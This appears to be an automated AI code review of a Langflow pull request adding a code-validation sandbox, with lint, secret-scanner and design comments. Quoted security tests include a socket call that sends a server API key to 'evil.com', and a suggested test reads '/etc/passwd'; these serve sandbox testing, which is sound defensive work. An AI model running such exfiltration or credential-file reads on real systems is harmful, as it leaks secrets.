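```python
import pytest

from lfx.custom.sandbox import SecurityViolation, execute_in_sandbox


def test_blocked_import_raises_security_violation():
    code_obj = compile("import subprocess", "<test>", "exec")
    # With LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION unset, the import is rejected during exec.
    with pytest.raises(SecurityViolation):
        execute_in_sandbox(code_obj, {})
```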

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 23-256, the
tests fail because execute_in_sandbox does not write back the sandbox namespace
into the provided exec_globals, dangerous-module imports raise SecurityViolation
at exec time (so tests never reach NameError assertions), and tests allow real
subprocess/socket IO; fix by (1) updating execute_in_sandbox to merge the final
sandbox_globals back into the provided exec_globals so test_func is available to
callers, (2) change these tests to either enable dangerous imports via a
dedicated pytest fixture/env var when you intend to allow them or assert that
execute_in_sandbox raises SecurityViolation for blocked imports (instead of
expecting NameError), and (3) prevent real external IO by monkeypatching/mocking
subprocess and socket calls (or replace those test cases with mocks/stubs) so
tests remain deterministic and do not perform network/command execution.

Comment on lines 29 to 36
    # Simulate server secrets stored in Python variables
    server_api_key = "sk-secret-key-12345"
    server_db_password = "db_password_secret"
    server_config = {
        "api_key": server_api_key,
        "database_url": "postgresql://user:password@localhost/db"
    }


⚠️ Potential issue | 🟡 Minor

Hard‑coded “API key”‑like test strings will keep tripping secret scanners

Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.

A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:

  • "sk-test-not-a-real-key-12345"
  • "dummy-secret-key"

or similar, or centralize them in a constant that scanners are configured to ignore.
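For example, a single module-level constant with an obviously fake value keeps the tests readable and gives scanners one place to allowlist (the name is illustrative):

```python
# Obviously fake placeholder; allowlist this constant once in the gitleaks config.
FAKE_SERVER_API_KEY = "test-placeholder-not-a-real-key"
```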

Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

@coderabbitai coderabbitai bot left a comment

Actionable comments posted: 9

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.

Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.

-        BoolInput(
-            name="allow_dangerous_deserialization",
-            display_name="Allow Dangerous Deserialization",
-            ...
-            value=True,
-        ),
+        BoolInput(
+            name="allow_dangerous_deserialization",
+            display_name="Allow Dangerous Deserialization",
+            ...
+            value=False,
+        ),

If you must load untrusted indexes, gate with environment flag and warn prominently in UI.

🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)

54-151: Consider adding dedicated sandbox security tests.

The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:

  1. Blocked operations - Verify that dangerous operations are blocked:

    • File system access (open(), os.remove(), os.system())
    • Subprocess execution (subprocess.run(), os.popen())
    • Network operations (socket, urllib, requests)
    • Module imports (__import__, importlib with dangerous modules)
  2. Allowed operations - Verify safe operations still work:

    • Standard math/string operations
    • Safe stdlib modules (math, json, typing, etc.)
  3. Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:

    • Setting can enable/disable dangerous operations
    • Setting is respected by validation logic
  4. Error handling - Verify appropriate errors are raised when blocked operations are attempted

Example test structure:

class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""
    
    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower()
    
    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json

def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []
src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag wiring for dangerous validation looks consistent

The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won’t affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.
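If dynamic toggling ever becomes a requirement, one low-cost option is to resolve the flag at call time rather than import time, along these lines (helper name is illustrative):

```python
import os


def dangerous_code_allowed() -> bool:
    """Re-read the env flag on every check so runtime changes are honored."""
    value = os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false")
    return value.strip().lower() in {"1", "true", "yes"}
```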

src/lfx/tests/unit/custom/test_sandbox_security.py (3)

3-13: Clarify relationship between namespace isolation and dangerous‑code flag

The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.


217-237: Avoid real outbound network connections in tests

In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('evil.com', 1337))
s.send(server_api_key.encode())

Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.

You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:

-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would‑be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'

This still proves that sandboxed code cannot obtain server_api_key, without touching the network.


252-285: Test name/docstring don’t match behavior in test_sandbox_cannot_access_imported_server_modules_state

The test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.

Either:

  • Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or
  • Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.

Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.

Prevent invalid/negative values from reaching the IBM params.

Within build_embeddings IBM branch:

-            params = {
-                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+            safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+            params = {
+                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
                 EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
             }
📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and b574590.

⛔ Files ignored due to path filters (1)
  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (8)
  • src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (142-176)
  • execute_in_sandbox (179-242)
  • isolated_import (152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

src/lfx/src/lfx/custom/sandbox.py

[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class


[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)


[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass


[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
  • GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
  • GitHub Check: Test Docker Images / Test docker images
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)

70-75: I need to examine the actual tests in the file to understand their context and expectations.

Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.

Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.


Clarify test coverage inconsistency and file path.

The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.

However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.

The tests at src/backend/tests/unit/api/v1/test_validate.py (lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still reference os/sys without apparent sandbox restrictions, they may be:

  1. Testing exception scenarios where blocking is expected
  2. Running under an environment with the override flag enabled
  3. Testing different code paths than the validate endpoint

Please confirm:

  • Is the file path src/backend/tests/unit/utils/test_validate.py correct, or has it been reorganized?
  • What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)

11-12: Sandbox integration in validate_code looks solid

Using create_isolated_import for both ast.Import and ast.ImportFrom and then running each FunctionDef through execute_in_sandbox with a constrained Langflow execution context gives you:

  • Blocked dangerous modules at import time (surfaced as structured import errors),
  • Definition‑time evaluation (decorators / default args) inside the sandbox, and
  • No leakage of server globals or real __builtins__ into user code.

The _create_langflow_execution_context fallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the /validate/code endpoint and looks correct.

Also applies to: 51-88, 93-150
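For readers who want the shape of that wiring without opening the files, a simplified sketch (the real validate_code collects richer error structures, and create_isolated_import's exact signature is assumed here):

```python
import ast

from lfx.custom.sandbox import SecurityViolation, create_isolated_import


def check_imports(code: str) -> list[str]:
    """Sketch: run each import statement through the isolated import hook."""
    errors: list[str] = []
    importer = create_isolated_import()
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            try:
                importer(name)
            except SecurityViolation as exc:
                errors.append(str(exc))
    return errors
```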

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)

2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.

The web search confirms that your code correctly uses:

  • Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
  • EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
  • WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19

All parameters and signatures match the documented patterns for the versions pinned in your dependencies.


1859-1866: Dependency versions verified and consistent.

Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:

  • Properly pinned in the JSON starter project configuration
  • Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
  • Mutually compatible with no conflicts detected
  • Compatible with project's Python requirement (>=3.10,<3.14)

Comment on lines +2018 to 2019
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
},

🛠️ Refactor suggestion | 🟠 Major

Avoid blocking calls and duplicate fetches when listing IBM models.

fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.

Apply this minimal change inside the EmbeddingModelComponent code block:

+import asyncio
@@
-            elif field_value == "IBM watsonx.ai":
-                build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
-                build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+            elif field_value == "IBM watsonx.ai":
+                models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+                build_config["model"]["options"] = models
+                build_config["model"]["value"] = (models[0] if models else "")
@@
-        elif field_name == "base_url_ibm_watsonx":
-            build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
-            build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+        elif field_name == "base_url_ibm_watsonx":
+            models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+            build_config["model"]["options"] = models
+            build_config["model"]["value"] = (models[0] if models else "")

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.

⚠️ Potential issue | 🟠 Major

Fix: use the updated value in Ollama base URL refresh.

The ollama_base_url handler ignores field_value, risking stale model lists.

Apply:

-        elif field_name == "ollama_base_url":
+        elif field_name == "ollama_base_url":
@@
-            ollama_url = self.ollama_base_url
+            ollama_url = field_value or self.ollama_base_url
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
